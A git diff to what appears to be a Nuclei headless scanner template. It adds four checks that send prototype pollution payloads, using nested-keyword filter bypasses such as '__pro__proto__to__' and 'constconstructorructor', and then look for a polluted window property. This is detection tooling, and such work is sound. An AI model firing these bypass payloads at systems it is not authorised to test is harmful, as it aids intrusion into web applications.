diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index 5489a5ce48..f5c7199944 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -88,4 +88,85 @@ headless: part: extract4 words: - "polluted" -# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - steps: + - args: + url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract5 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract5 + words: + - "polluted" + + - steps: + - args: + url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract6 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract6 + words: + - "polluted" + + - steps: + - args: + url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract7 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract7 + words: + - "polluted" + + - steps: + - args: + url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract8 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract8 + words: + - "polluted" + +# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950